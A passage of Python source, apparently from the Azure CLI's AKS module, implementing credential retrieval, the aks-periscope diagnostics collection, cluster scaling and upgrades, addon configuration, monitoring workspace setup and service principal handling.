delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def aks_get_credentials(cmd,  # pylint: disable=unused-argument
                        client,
                        resource_group_name,
                        name,
                        admin=False,
                        user='clusterUser',
                        path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
                        overwrite_existing=False,
                        context_name=None):
    """Fetch cluster access credentials and write/merge them into a kubeconfig file."""
    # Select the credential listing call matching the requested role.
    if admin:
        credential_results = client.list_cluster_admin_credentials(resource_group_name, name)
    elif user.lower() == 'clusteruser':
        credential_results = client.list_cluster_user_credentials(resource_group_name, name)
    elif user.lower() == 'clustermonitoringuser':
        credential_results = client.list_cluster_monitoring_user_credentials(resource_group_name, name)
    else:
        raise CLIError("The user is invalid.")

    if not credential_results:
        raise CLIError("No Kubernetes credentials found.")

    try:
        kubeconfig = credential_results.kubeconfigs[0].value.decode(encoding='UTF-8')
        _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name)
    except (IndexError, ValueError):
        raise CLIError("Fail to find kubeconfig file.")
# pylint: disable=line-too-long
def aks_kollect(cmd,   # pylint: disable=too-many-statements,too-many-locals
                client,
                resource_group_name,
                name,
                storage_account=None,
                sas_token=None,
                container_logs=None,
                kube_objects=None,
                node_logs=None):
    """Collect cluster diagnostics by deploying the aks-periscope daemon set.

    Resolves (or derives) a storage account and SAS token, prompts the user
    for consent, deploys aks-periscope into the cluster via kubectl, and
    prints the storage URL where the collected logs land.

    Fix: corrected the user-facing typo "Azure Stroage Explorer".
    """
    colorama.init()

    mc = client.get(resource_group_name, name)

    if not which('kubectl'):
        raise CLIError('Can not find kubectl executable in PATH')

    # Resolve the storage account: explicit argument wins, otherwise fall back
    # to the account configured in the cluster's diagnostic settings.
    storage_account_id = None
    if storage_account is None:
        print("No storage account specified. Try getting storage account from diagnostic settings")
        storage_account_id = get_storage_account_from_diag_settings(cmd.cli_ctx, resource_group_name, name)
        if storage_account_id is None:
            raise CLIError("A storage account must be specified, since there isn't one in the diagnostic settings.")

    from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
    if storage_account_id is None:
        if not is_valid_resource_id(storage_account):
            # Bare account name: expand to a full resource id in this RG/subscription.
            storage_account_id = resource_id(
                subscription=get_subscription_id(cmd.cli_ctx),
                resource_group=resource_group_name,
                namespace='Microsoft.Storage', type='storageAccounts',
                name=storage_account
            )
        else:
            storage_account_id = storage_account

    if is_valid_resource_id(storage_account_id):
        try:
            parsed_storage_account = parse_resource_id(storage_account_id)
        except CloudError as ex:
            raise CLIError(ex.message)
    else:
        raise CLIError("Invalid storage account id %s" % storage_account_id)

    storage_account_name = parsed_storage_account['name']

    # Without an explicit SAS token, mint a 1-day read-write token for the
    # uploader plus a separate read-only token to hand back to the user.
    readonly_sas_token = None
    if sas_token is None:
        storage_client = cf_storage(cmd.cli_ctx, parsed_storage_account['subscription'])
        storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
                                                                         storage_account_name)
        kwargs = {
            'account_name': storage_account_name,
            'account_key': storage_account_keys.keys[0].value
        }
        cloud_storage_client = cloud_storage_account_service_factory(cmd.cli_ctx, kwargs)

        sas_token = cloud_storage_client.generate_shared_access_signature(
            'b',
            'sco',
            'rwdlacup',
            datetime.datetime.utcnow() + datetime.timedelta(days=1))

        readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
            'b',
            'sco',
            'rl',
            datetime.datetime.utcnow() + datetime.timedelta(days=1))

        readonly_sas_token = readonly_sas_token.strip('?')

    from knack.prompting import prompt_y_n

    print()
    print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
          f'save them to the storage account '
          f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
          f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
    print()
    print('If you share access to that storage account to Azure support, you consent to the terms outlined'
          f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
    print()
    if not prompt_y_n('Do you confirm?', default="n"):
        return

    print()
    print("Getting credentials for cluster %s " % name)
    _, temp_kubeconfig_path = tempfile.mkstemp()
    aks_get_credentials(cmd, client, resource_group_name, name, admin=True, path=temp_kubeconfig_path)

    print()
    print("Starts collecting diag info for cluster %s " % name)

    sas_token = sas_token.strip('?')
    # Inject the (base64-encoded) storage account and SAS key into the
    # published aks-periscope deployment manifest.
    deployment_yaml = urlopen(
        "https://raw.githubusercontent.com/Azure/aks-periscope/latest/deployment/aks-periscope.yaml").read().decode()
    deployment_yaml = deployment_yaml.replace("# <accountName, base64 encoded>",
                                              (base64.b64encode(bytes(storage_account_name, 'ascii'))).decode('ascii'))
    deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
                                              (base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))

    yaml_lines = deployment_yaml.splitlines()
    for index, line in enumerate(yaml_lines):
        if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
            yaml_lines[index] = line + ' ' + container_logs
        if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
            yaml_lines[index] = line + ' ' + kube_objects
        if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
            yaml_lines[index] = line + ' ' + node_logs
    deployment_yaml = '\n'.join(yaml_lines)

    fd, temp_yaml_path = tempfile.mkstemp()
    temp_yaml_file = os.fdopen(fd, 'w+t')
    try:
        temp_yaml_file.write(deployment_yaml)
        temp_yaml_file.flush()
        temp_yaml_file.close()
        try:
            # Tear down any leftovers from a previous run before redeploying.
            print()
            print("Cleaning up aks-periscope resources if existing")

            subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
                             "serviceaccount,configmap,daemonset,secret",
                             "--all", "-n", "aks-periscope", "--ignore-not-found"],
                            stderr=subprocess.STDOUT)

            subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
                             "ClusterRoleBinding",
                             "aks-periscope-role-binding", "--ignore-not-found"],
                            stderr=subprocess.STDOUT)

            subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
                             "ClusterRoleBinding",
                             "aks-periscope-role-binding-view", "--ignore-not-found"],
                            stderr=subprocess.STDOUT)

            subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
                             "ClusterRole",
                             "aks-periscope-role", "--ignore-not-found"],
                            stderr=subprocess.STDOUT)

            subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
                             "--all",
                             "apd", "-n", "aks-periscope", "--ignore-not-found"],
                            stderr=subprocess.DEVNULL)

            subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
                             "CustomResourceDefinition",
                             "diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
                            stderr=subprocess.STDOUT)

            print()
            print("Deploying aks-periscope")

            subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
                                     temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
        except subprocess.CalledProcessError as err:
            raise CLIError(err.output)
    finally:
        os.remove(temp_yaml_path)

    print()

    fqdn = mc.fqdn if mc.fqdn is not None else mc.private_fqdn
    normalized_fqdn = fqdn.replace('.', '-')
    token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
    log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
                              f"{_trim_fqdn_name_containing_hcp(normalized_fqdn)}?{token_in_storage_account_url}"

    print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')

    print()
    print(f'You can download Azure Storage Explorer here '
          f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
          f' to check the logs by adding the storage account using the following URL:')
    print(f'{format_hyperlink(log_storage_account_url)}')

    print()
    if not prompt_y_n('Do you want to see analysis results now?', default="n"):
        print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
              f"anytime to check the analysis results.")
    else:
        display_diagnostics_report(temp_kubeconfig_path)
def aks_kanalyze(cmd, client, resource_group_name, name):
    """Display the diagnostics analysis report for a cluster previously collected by aks-periscope."""
    colorama.init()

    # Raises if the cluster does not exist; the returned model is not needed.
    client.get(resource_group_name, name)

    _, kubeconfig_path = tempfile.mkstemp()
    aks_get_credentials(cmd, client, resource_group_name, name,
                        admin=True, path=kubeconfig_path)

    display_diagnostics_report(kubeconfig_path)
def aks_scale(cmd,  # pylint: disable=unused-argument
              client,
              resource_group_name,
              name,
              node_count,
              nodepool_name="",
              no_wait=False):
    """Set the node count of one node pool and PUT the updated cluster back."""
    instance = client.get(resource_group_name, name)
    pool_count = len(instance.agent_pool_profiles)

    # Ambiguous target: multiple pools but no pool name given.
    if pool_count > 1 and nodepool_name == "":
        raise CLIError('There are more than one node pool in the cluster. '
                       'Please specify nodepool name or use az aks nodepool command to scale node pool')

    for pool_profile in instance.agent_pool_profiles:
        is_default_single_pool = nodepool_name == "" and pool_count == 1
        if pool_profile.name == nodepool_name or is_default_single_pool:
            if pool_profile.enable_auto_scaling:
                raise CLIError("Cannot scale cluster autoscaler enabled node pool.")

            pool_profile.count = int(node_count)  # pylint: disable=no-member
            # null out the SP and AAD profile because otherwise validation complains
            instance.service_principal_profile = None
            instance.aad_profile = None
            return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)

    raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, # pylint: disable=unused-argument, too-many-return-statements
                client,
                resource_group_name,
                name,
                kubernetes_version='',
                control_plane_only=False,
                no_wait=False,
                node_image_only=False,
                yes=False):
    """Upgrade a managed cluster's Kubernetes version and/or node images.

    Three modes, gated by confirmation prompts unless --yes is given
    (returns None whenever the user declines):
    - node_image_only: upgrade the node image of every node pool without
      touching the Kubernetes version (VMSS-backed clusters only).
    - control_plane_only: upgrade only the control plane (not available on
      legacy/VMAS clusters, which always upgrade all pools together).
    - default: upgrade the control plane AND every node pool.
    """
    from knack.prompting import prompt_y_n
    msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
    if not yes and not prompt_y_n(msg, default="n"):
        return None
    instance = client.get(resource_group_name, name)

    # Any AvailabilitySet-backed pool marks the whole cluster as legacy (VMAS).
    vmas_cluster = False
    for agent_profile in instance.agent_pool_profiles:
        if agent_profile.type.lower() == "availabilityset":
            vmas_cluster = True
            break

    if kubernetes_version != '' and node_image_only:
        raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
                       'If you only want to upgrade the node version please use the "--node-image-only" option only.')

    if node_image_only:
        msg = "This node image upgrade operation will run across every node pool in the cluster" \
              "and might take a while, do you wish to continue?"
        if not yes and not prompt_y_n(msg, default="n"):
            return None
        # This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
        # nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
        for agent_pool_profile in instance.agent_pool_profiles:
            if vmas_cluster:
                raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
                               'can only be applied on VirtualMachineScaleSets cluster.')
            agent_pool_client = cf_agent_pools(cmd.cli_ctx)
            # First argument True = fire-and-forget each pool upgrade; the
            # refreshed cluster is fetched and returned below.
            _upgrade_single_nodepool_image_version(True, agent_pool_client, resource_group_name, name, agent_pool_profile.name)
        mc = client.get(resource_group_name, name)
        return _remove_nulls([mc])[0]

    # Same-version upgrade is a no-op unless the cluster is in a failed state,
    # where re-submitting can resolve it; warn either way and proceed.
    if instance.kubernetes_version == kubernetes_version:
        if instance.provisioning_state == "Succeeded":
            logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
                           "will occur when upgrading to the same version if the cluster is not in a failed state.",
                           instance.kubernetes_version)
        elif instance.provisioning_state == "Failed":
            logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
                           "attempt resolution of failed cluster state.", instance.kubernetes_version)

    upgrade_all = False
    instance.kubernetes_version = kubernetes_version

    # for legacy clusters, we always upgrade node pools with CCP.
    if instance.max_agent_pools < 8 or vmas_cluster:
        if control_plane_only:
            msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
                   "upgraded to {} as well. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None
        upgrade_all = True
    else:
        if not control_plane_only:
            msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
                   "AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None
            upgrade_all = True
        else:
            msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
                   "Node pool will not change. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None

    if upgrade_all:
        for agent_profile in instance.agent_pool_profiles:
            agent_profile.orchestrator_version = kubernetes_version

    # null out the SP and AAD profile because otherwise validation complains
    instance.service_principal_profile = None
    instance.aad_profile = None

    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name):
    """Start a node-image-only upgrade for a single agent pool, honoring no_wait."""
    poller = sdk_no_wait(no_wait, client.upgrade_node_image_version,
                         resource_group_name, cluster_name, nodepool_name)
    return poller
def _handle_addons_args(cmd,  # pylint: disable=too-many-statements
                        addons_str,
                        subscription_id,
                        resource_group_name,
                        addon_profiles=None,
                        workspace_resource_id=None,
                        appgw_name=None,
                        appgw_subnet_prefix=None,
                        appgw_subnet_cidr=None,
                        appgw_id=None,
                        appgw_subnet_id=None,
                        appgw_watch_namespace=None,
                        disable_sgxquotehelper=False):
    """Translate a comma-separated --enable-addons string into addon profiles.

    Returns the (possibly pre-populated) addon_profiles dict with one enabled
    ManagedClusterAddonProfile per requested addon. Raises CLIError for
    unrecognized addon names, or when --workspace-resource-id is supplied
    without the monitoring addon.
    """
    addon_profiles = addon_profiles or {}
    addons = addons_str.split(',') if addons_str else []

    # Addons that take no configuration: just an enabled profile.
    for addon_name, profile_key in (('http_application_routing', CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME),
                                    ('kube-dashboard', CONST_KUBE_DASHBOARD_ADDON_NAME)):
        if addon_name in addons:
            addon_profiles[profile_key] = ManagedClusterAddonProfile(enabled=True)
            addons.remove(addon_name)

    # TODO: can we help the user find a workspace resource ID?
    if 'monitoring' in addons:
        if not workspace_resource_id:
            # use default workspace if exists else create default workspace
            workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
                cmd, subscription_id, resource_group_name)

        # Normalize to '/subscriptions/...' form with no trailing slash.
        workspace_resource_id = workspace_resource_id.strip()
        if not workspace_resource_id.startswith('/'):
            workspace_resource_id = '/' + workspace_resource_id
        if workspace_resource_id.endswith('/'):
            workspace_resource_id = workspace_resource_id.rstrip('/')
        addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(
            enabled=True, config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id})
        addons.remove('monitoring')
    # error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
    elif workspace_resource_id:
        raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')

    for addon_name, profile_key in (('azure-policy', CONST_AZURE_POLICY_ADDON_NAME),
                                    ('gitops', 'gitops')):
        if addon_name in addons:
            addon_profiles[profile_key] = ManagedClusterAddonProfile(enabled=True)
            addons.remove(addon_name)

    if 'ingress-appgw' in addons:
        appgw_config = {}
        # Later pairs overwrite earlier ones sharing a key: subnet prefix is
        # the legacy spelling of subnet CIDR, so an explicit CIDR wins.
        for config_key, config_value in (
                (CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME, appgw_name),
                (CONST_INGRESS_APPGW_SUBNET_CIDR, appgw_subnet_prefix),
                (CONST_INGRESS_APPGW_SUBNET_CIDR, appgw_subnet_cidr),
                (CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, appgw_id),
                (CONST_INGRESS_APPGW_SUBNET_ID, appgw_subnet_id),
                (CONST_INGRESS_APPGW_WATCH_NAMESPACE, appgw_watch_namespace)):
            if config_value is not None:
                appgw_config[config_key] = config_value
        addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = ManagedClusterAddonProfile(
            enabled=True, config=appgw_config)
        addons.remove('ingress-appgw')

    if 'open-service-mesh' in addons:
        addon_profiles[CONST_OPEN_SERVICE_MESH_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True, config={})
        addons.remove('open-service-mesh')

    if 'confcom' in addons:
        sgx_helper_enabled = "false" if disable_sgxquotehelper else "true"
        addon_profiles[CONST_CONFCOM_ADDON_NAME] = ManagedClusterAddonProfile(
            enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: sgx_helper_enabled})
        addons.remove('confcom')

    # error out if any (unrecognized) addons remain
    if addons:
        raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
            ",".join(addons), "are" if len(addons) > 1 else "is"))
    return addon_profiles
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
    """Return (creating if necessary) the default Log Analytics workspace for the monitoring addon.

    Maps the resource group's region to the region/code used for the default
    'DefaultResourceGroup-<code>' / 'DefaultWorkspace-<sub>-<code>' naming,
    per cloud (public, China, US Government). Raises CLIError when the addon
    is not supported in the current cloud.
    """
    # mapping for azure public cloud
    # log analytics workspaces cannot be created in WCUS region due to capacity limits
    # so mapped to EUS per discussion with log analytics team
    AzureCloudLocationToOmsRegionCodeMap = {
        "australiasoutheast": "ASE",
        "australiaeast": "EAU",
        "australiacentral": "CAU",
        "canadacentral": "CCA",
        "centralindia": "CIN",
        "centralus": "CUS",
        "eastasia": "EA",
        "eastus": "EUS",
        "eastus2": "EUS2",
        "eastus2euap": "EAP",
        "francecentral": "PAR",
        "japaneast": "EJP",
        "koreacentral": "SE",
        "northeurope": "NEU",
        "southcentralus": "SCUS",
        "southeastasia": "SEA",
        "uksouth": "SUK",
        "usgovvirginia": "USGV",
        "westcentralus": "EUS",
        "westeurope": "WEU",
        "westus": "WUS",
        "westus2": "WUS2"
    }
    AzureCloudRegionToOmsRegionMap = {
        "australiacentral": "australiacentral",
        "australiacentral2": "australiacentral",
        "australiaeast": "australiaeast",
        "australiasoutheast": "australiasoutheast",
        "brazilsouth": "southcentralus",
        "canadacentral": "canadacentral",
        "canadaeast": "canadacentral",
        "centralus": "centralus",
        "centralindia": "centralindia",
        "eastasia": "eastasia",
        "eastus": "eastus",
        "eastus2": "eastus2",
        "francecentral": "francecentral",
        "francesouth": "francecentral",
        "japaneast": "japaneast",
        "japanwest": "japaneast",
        "koreacentral": "koreacentral",
        "koreasouth": "koreacentral",
        "northcentralus": "eastus",
        "northeurope": "northeurope",
        "southafricanorth": "westeurope",
        "southafricawest": "westeurope",
        "southcentralus": "southcentralus",
        "southeastasia": "southeastasia",
        "southindia": "centralindia",
        "uksouth": "uksouth",
        "ukwest": "uksouth",
        "westcentralus": "eastus",
        "westeurope": "westeurope",
        "westindia": "centralindia",
        "westus": "westus",
        "westus2": "westus2"
    }

    # mapping for azure china cloud
    # log analytics only support China East2 region
    AzureChinaLocationToOmsRegionCodeMap = {
        "chinaeast": "EAST2",
        "chinaeast2": "EAST2",
        "chinanorth": "EAST2",
        "chinanorth2": "EAST2"
    }
    AzureChinaRegionToOmsRegionMap = {
        "chinaeast": "chinaeast2",
        "chinaeast2": "chinaeast2",
        "chinanorth": "chinaeast2",
        "chinanorth2": "chinaeast2"
    }

    # mapping for azure us government cloud
    AzureFairfaxLocationToOmsRegionCodeMap = {
        "usgovvirginia": "USGV"
    }
    AzureFairfaxRegionToOmsRegionMap = {
        "usgovvirginia": "usgovvirginia"
    }

    rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
    cloud_name = cmd.cli_ctx.cloud.name

    if cloud_name.lower() == 'azurecloud':
        workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus")
        workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS")
    elif cloud_name.lower() == 'azurechinacloud':
        workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2")
        workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2")
    elif cloud_name.lower() == 'azureusgovernment':
        workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia")
        workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV")
    else:
        logger.error("AKS Monitoring addon not supported in cloud : %s", cloud_name)
        # BUGFIX: previously execution fell through here and crashed below with
        # an UnboundLocalError on workspace_region_code; fail fast instead.
        raise CLIError('AKS Monitoring addon not supported in cloud : {}'.format(cloud_name))

    default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
    default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)

    default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
        '/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
    resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
    resources = cf_resources(cmd.cli_ctx, subscription_id)

    # check if default RG exists
    if resource_groups.check_existence(default_workspace_resource_group):
        try:
            resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
            return resource.id
        except CloudError as ex:
            # 404 means the workspace itself is missing: fall through and create it.
            if ex.status_code != 404:
                raise ex
    else:
        resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})

    default_workspace_params = {
        'location': workspace_region,
        'properties': {
            'sku': {
                'name': 'standalone'
            }
        }
    }
    async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
                                                    default_workspace_params)

    # Poll in 15-second slices until the workspace creation completes.
    ws_resource_id = ''
    while True:
        result = async_poller.result(15)
        if async_poller.done():
            ws_resource_id = result.id
            break

    return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
    """Publish the ContainerInsights solution into the Log Analytics workspace
    referenced by the monitoring addon profile.

    Args:
        cmd: CLI command context (supplies ``cli_ctx`` for ARM clients).
        addon: the monitoring addon profile; its ``config`` must carry the
            Log Analytics workspace resource ID.

    Returns:
        None when the addon is disabled, otherwise the result of the ARM
        deployment that installs the solution.

    Raises:
        CLIError: when the workspace resource ID cannot be parsed.
        CloudError: when the workspace resource cannot be fetched.
    """
    if not addon.enabled:
        return None
    # workaround for this addon key which has been seen lowercased in the wild
    for key in list(addon.config):
        if key.lower() == CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID.lower() and key != CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID:
            addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID] = addon.config.pop(key)
    # Normalize the workspace resource ID: exactly one leading '/', no trailing '/'.
    workspace_resource_id = addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID].strip()
    if not workspace_resource_id.startswith('/'):
        workspace_resource_id = '/' + workspace_resource_id
    if workspace_resource_id.endswith('/'):
        workspace_resource_id = workspace_resource_id.rstrip('/')
    # extract subscription ID and resource group from workspace_resource_id URL
    try:
        subscription_id = workspace_resource_id.split('/')[2]
        resource_group = workspace_resource_id.split('/')[4]
    except IndexError:
        raise CLIError('Could not locate resource group in workspace-resource-id URL.')
    # region of workspace can be different from region of RG so find the location of the workspace_resource_id
    resources = cf_resources(cmd.cli_ctx, subscription_id)
    try:
        resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
        location = resource.location
    except CloudError as ex:
        raise ex
    # Millisecond timestamp keeps the deployment name unique per invocation.
    unix_time_in_millis = int(
        (datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
    solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
    # ARM template: a nested deployment targeted at the workspace's own
    # subscription/resource group (parsed from the workspace resource ID)
    # that creates the 'ContainerInsights(<workspace>)' solution resource.
    # pylint: disable=line-too-long
    template = {
        "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
        "contentVersion": "1.0.0.0",
        "parameters": {
            "workspaceResourceId": {
                "type": "string",
                "metadata": {
                    "description": "Azure Monitor Log Analytics Resource ID"
                }
            },
            "workspaceRegion": {
                "type": "string",
                "metadata": {
                    "description": "Azure Monitor Log Analytics workspace region"
                }
            },
            "solutionDeploymentName": {
                "type": "string",
                "metadata": {
                    "description": "Name of the solution deployment"
                }
            }
        },
        "resources": [
            {
                "type": "Microsoft.Resources/deployments",
                "name": "[parameters('solutionDeploymentName')]",
                "apiVersion": "2017-05-10",
                "subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
                "resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
                "properties": {
                    "mode": "Incremental",
                    "template": {
                        "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
                        "contentVersion": "1.0.0.0",
                        "parameters": {},
                        "variables": {},
                        "resources": [
                            {
                                "apiVersion": "2015-11-01-preview",
                                "type": "Microsoft.OperationsManagement/solutions",
                                "location": "[parameters('workspaceRegion')]",
                                "name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
                                "properties": {
                                    "workspaceResourceId": "[parameters('workspaceResourceId')]"
                                },
                                "plan": {
                                    "name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
                                    "product": "[Concat('OMSGallery/', 'ContainerInsights')]",
                                    "promotionCode": "",
                                    "publisher": "Microsoft"
                                }
                            }
                        ]
                    },
                    "parameters": {}
                }
            }
        ]
    }
    params = {
        "workspaceResourceId": {
            "value": workspace_resource_id
        },
        "workspaceRegion": {
            "value": location
        },
        "solutionDeploymentName": {
            "value": solution_deployment_name
        }
    }
    deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
    # publish the Container Insights solution to the Log Analytics workspace
    return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
                              validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_service_principal(cli_ctx,
                                  service_principal=None,
                                  client_secret=None,
                                  subscription_id=None,
                                  dns_name_prefix=None,
                                  location=None,
                                  name=None):
    """Resolve the service principal to use for an AKS cluster.

    Order of precedence: an explicitly supplied --service-principal (which
    then requires --client-secret), then one cached on local disk, then a
    freshly created one. Whatever is resolved is stored back to disk and
    re-loaded so the caller always gets the on-disk representation.
    """
    file_name_aks = 'aksServicePrincipal.json'
    # TODO: This really needs to be unit tested.
    rbac_client = get_graph_rbac_management_client(cli_ctx)
    if service_principal:
        # --service-principal was given explicitly; --client-secret must come with it.
        if not client_secret:
            raise CLIError('--client-secret is required if --service-principal is specified')
    else:
        # No --service-principal: try the locally cached credentials first.
        cached = load_acs_service_principal(subscription_id, file_name=file_name_aks)
        if cached:
            service_principal = cached.get('service_principal')
            client_secret = cached.get('client_secret')
        else:
            # Nothing cached either — create a brand-new service principal.
            client_secret = client_secret or _create_client_secret()
            salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
            url = 'http://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
            service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
            if not service_principal:
                raise CLIError('Could not create a service principal with the right permissions. '
                               'Are you an Owner on this project?')
            logger.info('Created a service principal: %s', service_principal)
            # No role assignment is needed for this newly created SPN.
    store_acs_service_principal(subscription_id, client_secret, service_principal, file_name=file_name_aks)
    return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
    """Return the Azure location (region) of the given resource group."""
    groups_client = cf_resource_groups(ctx, subscription_id=subscription_id)
    # The get call doubles as an existence check: it errors out if the group is missing.
    return groups_client.get(resource_group_name).location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
                                   min_count,
                                   max_count,
                                   node_count,
                                   agent_pool_profile):
    """Validate the autoscaler flags and apply them to the agent pool profile.

    When enable_cluster_autoscaler is true, both min_count and max_count are
    required, min <= max must hold, node_count must fall inside that range,
    and the profile's min/max/enable_auto_scaling fields are set. When it is
    false, supplying min_count or max_count is an error. Raises CLIError on
    any violation.
    """
    if not enable_cluster_autoscaler:
        # min/max only make sense together with --enable-cluster-autoscaler.
        if min_count is not None or max_count is not None:
            raise CLIError('min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
        return
    if min_count is None or max_count is None:
        raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
    lower, upper, current = int(min_count), int(max_count), int(node_count)
    if lower > upper:
        raise CLIError('value of min-count should be less than or equal to value of max-count')
    if not lower <= current <= upper:
        raise CLIError('node-count is not in the range of min-count and max-count')
    agent_pool_profile.min_count = lower
    agent_pool_profile.max_count = upper
    agent_pool_profile.enable_auto_scaling = True
def _create_client_secret():
    """Generate a random client secret for an AAD service principal.

    10 random bytes become 20 lowercase hex characters; a '$' is appended
    to satisfy AAD's special-character requirement for SP secrets.
    """
    special_char = '$'
    return os.urandom(10).hex() + special_char
def _ensure_aks_acr(cli_ctx,
                    client_id,
                    acr_name_or_id,
                    subscription_id,  # pylint: disable=unused-argument
                    detach=False):
